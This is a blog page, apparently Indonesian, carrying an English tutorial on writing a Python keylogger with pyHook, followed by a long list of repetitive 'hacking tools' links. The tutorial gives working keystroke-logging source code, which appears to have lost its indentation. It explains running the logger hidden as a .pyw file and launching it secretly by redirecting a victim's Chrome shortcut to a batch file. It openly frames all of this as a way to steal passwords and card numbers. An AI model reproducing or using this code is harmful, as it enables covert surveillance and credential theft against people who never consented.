SELAMAT DATANG DI TEMPATKU.

Semoga anda puas dan betah di tempatku. Walau pun semua serba sederhana serta ke kurangan. Maklum aja, aku baru belajar...! Karena itu aku sangat mengharapkan sekali Petunjuk serta Bimbingan dari anda yang datang ke tempat ini. Demi kemajuah dan perbaikan Blog yang masih sembraut tak karuan. dan serba asal - asalan.

Wasalamm...!

How To Make A Simple And Powerful Keylogger Using Python

A keylogger is a computer program which can be written using any computer programming language such as c++ when you install it on a Victim system it can keep the records of every keystroke in a text file. Keylogger is mainly used to steal confidential data such as passwords, credit card numbers etc.

How to make a python keylogger?

A keylogger can be programmed using any programming language such as c++, java, c# e.tc. For this tutorial, I will use python to make a keylogger, because python is flexible, powerful and simple to understand even a non-programmer can use python to make a keylogger.
Requirements to create a python keylogger
  • Computer With Operating system: Windows, Mac os or Linux
  • Python must be installed on the system
  • Pip (Python index package ) you will need this to install python software packages.
  • Pypiwin32 and PyHook packages
  • Basic understanding of computers
You will learn to install these things one by one. If you have already installed and configured the python development kit feel free to skip Part 1.
Part 1: Downloading Python and pip, setting up the environment to create the keylogger.Step 1:
Download python development kit by clicking here.
Choose python 2.7 because I am using this version. It is ok if you have a different version of python this method will work on every version of python.
Step 2:
Installation of python is pretty simple.Open the python setup file, Mark the checkboxes Very important else you have to set the python path manually, and click on Install Now.
Step 3:
You need Pypiwin32 and PyHook python packages to create python keylogger. To install these packages you need pip, you can install Pypiwin32 and PyHook without using pip which is not recommended.
To download pip go to https://pip.pypa.io/en/stable/installing/ and Save link as by right clicking on get-pip.py. when the download is done, just run the get-pip.py file.
Now you need to set the Variable path for pip to do this right click on the computer icon and choose properties.
Now click on the Advanced system settings
Choose Environment Variables.
Choose New, Set the Variable name: PATH and Variable value as C:\Python27\Scripts
Click on ok.
Part 2: Installing Pypiwin32 and PyHook python Packages using pip:
Open Command Prompt(CMD) and type: pip installs Pypiwin32 press the Enter Key, wait for the installation to complete. After the Pypiwin32 package installation type: pip install PyHook press the Enter Key and wait for the installation to complete.When done close the Command Prompt.
Part 3: Creating and testing the python keylogger:
Now you have configured your environment and installed all the necessary packages, let's start creating the keylogger. Click on the start menu and scroll down until you find Python 2.7, run python IDLE(GUI) by clicking on it.
Go to the File, from the drop-down menu choose New file.

Python Keylogger source code:

Copy these lines of code and paste into the new file. Modify the directory in the second line of code to your own location e.g 'C:\test\log.txt' this will create a folder named test in C save the log.txt file there when the Keylogger start.
import pyHook, pythoncom, sys, logging
file_log='F:\\test\\log.txt'
def onKeyboardEvent(event):
logging.basicConfig(filename=file_log,level=logging.DEBUG,format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager=pyHook.HookManager()
hooks_manager.KeyDown=onKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
Save your file as a test.pyw at any location you want, the .pyw extension is very important because of it the python keylogger will run in the background without notifying the user.
The Python Keylogger is now completed you can test it out by opening it and typing some text in your browser, go to the log.txt file which is in the F:\test\log.txt on my PC. You will find your log.txt file in C:\test\log.txt.But what if you want to test it on someone else computer? you want to run it without the user knowing that it has been launched, this can be done by attaching it to the program that the victim always uses such as Google Chrome.
Let's make the python keylogger auto-launchable by attaching it the Google Chrome.
Copy the following code and paste into notepad. Save it by giving .bat extension e.g launch.bat in a hidden location, e.g c:\test\launch.bat
Now right click on the google chrome desktop shortcut icon and click on properties. You will see a field called Target. Change the target field to the batch file launch.bat directory that you created. let's say you have saved your launch.bat file in a test folder in C, Then change the target field with "C:\test\launch.bat". Now, whenever the user opens chrome the keylogger will run automatically.
Related links
  1. Hacking Tools For Beginners
  2. Hack Tool Apk
  3. Hack App
  4. Pentest Tools
  5. Hacking Tools Kit
  6. Hacking Tools 2019
  7. How To Make Hacking Tools
  8. Underground Hacker Sites
  9. Hacker Tools For Ios
  10. Pentest Tools Website
  11. Pentest Tools Bluekeep
  12. Hacking Tools Github
  13. Hacker Tools For Ios
  14. New Hack Tools
  15. Hacking Tools Windows 10
  16. Hack Tools
  17. Pentest Tools Website Vulnerability
  18. Pentest Tools Github
  19. Hacker Tools For Windows
  20. Pentest Box Tools Download
  21. Pentest Tools Website
  22. Hacker Tools For Mac
  23. What Are Hacking Tools
  24. Hacker Tools Free Download
  25. Pentest Tools Subdomain
  26. Hacking Tools Windows 10
  27. Hacker Tools Online
  28. Underground Hacker Sites
  29. Hacking Tools Download
  30. Pentest Tools Windows
  31. Hacker Tools Linux
  32. Hackers Toolbox
  33. New Hack Tools
  34. Pentest Tools Android
  35. Hacks And Tools
  36. Game Hacking
  37. Pentest Automation Tools
  38. Pentest Tools Url Fuzzer
  39. Pentest Tools Github
  40. Hacking Tools Download
  41. Hacker Tools 2019
  42. Hacking Tools For Windows 7
  43. Pentest Automation Tools
  44. Pentest Tools
  45. Hacks And Tools
  46. Hack Tools For Ubuntu
  47. Hacking Tools 2019
  48. Pentest Tools Alternative
  49. Pentest Tools Linux
  50. Hacking Tools Pc
  51. Hacker Tools Apk Download
  52. Hack Rom Tools
  53. Pentest Tools Find Subdomains
  54. Pentest Tools For Android
  55. Pentest Tools For Mac
  56. Hacking Tools 2019
  57. Pentest Tools Free
  58. Hack Tools Mac
  59. Github Hacking Tools
  60. Pentest Tools
  61. Hacking App
  62. Hack Tools For Pc
  63. Hacks And Tools
  64. Hacker Tools
  65. Pentest Tools Github
  66. Hacker Tools List
  67. Best Hacking Tools 2020
  68. Pentest Tools Alternative
  69. Hacker Tools For Mac
  70. Hacker Tools For Mac
  71. Hak5 Tools
  72. Pentest Tools Tcp Port Scanner
  73. Hacker Tools Github
  74. Hack Tools Online
  75. Hacking Tools For Windows Free Download
  76. Hack Tools For Games
  77. Pentest Automation Tools
  78. Hacking Tools And Software
  79. Hacking Tools For Mac
  80. Hacker Hardware Tools
  81. Hackrf Tools
  82. Hacking Tools Mac
  83. Pentest Tools Url Fuzzer
  84. Pentest Tools For Mac
  85. Nsa Hacker Tools
  86. Hacker Tools For Ios
  87. New Hack Tools
  88. Hacker Tools Windows
  89. Hacks And Tools
  90. Hack Tools
  91. Hacking Tools Mac
  92. Pentest Tools Linux
  93. Hackers Toolbox
  94. Install Pentest Tools Ubuntu
  95. Hacker
  96. Hacker Tools 2019
  97. Pentest Tools Tcp Port Scanner
  98. Nsa Hack Tools Download
  99. Top Pentest Tools
  100. Hacker Tools Mac
  101. Usb Pentest Tools
  102. Hak5 Tools
  103. Hack Tool Apk No Root
  104. Hacking Tools Pc
  105. Pentest Tools Port Scanner
  106. Hacking Tools Windows 10
  107. New Hacker Tools
  108. Hack Tools For Ubuntu
  109. Hack Tools Download
  110. Hacking Tools Software
  111. Hack Tools
  112. Pentest Tools Android
  113. What Are Hacking Tools
  114. Hacker Tools Free
  115. Hacker Tools Linux
  116. How To Hack
  117. How To Install Pentest Tools In Ubuntu
  118. Hacker Tools Software
  119. Pentest Recon Tools
  120. Hack Tools For Ubuntu
  121. Pentest Tools Apk
  122. Pentest Automation Tools
  123. Hack Apps
  124. Hacker Tools Linux
  125. Hacker Tools 2019
  126. Top Pentest Tools
  127. Hacking Tools 2019
  128. Hacking Tools Usb
  129. Game Hacking
  130. Hacker Tools For Windows
  131. Hack Tools For Ubuntu
  132. Hacking Tools And Software
  133. Best Hacking Tools 2019

Tidak ada komentar:

Posting Komentar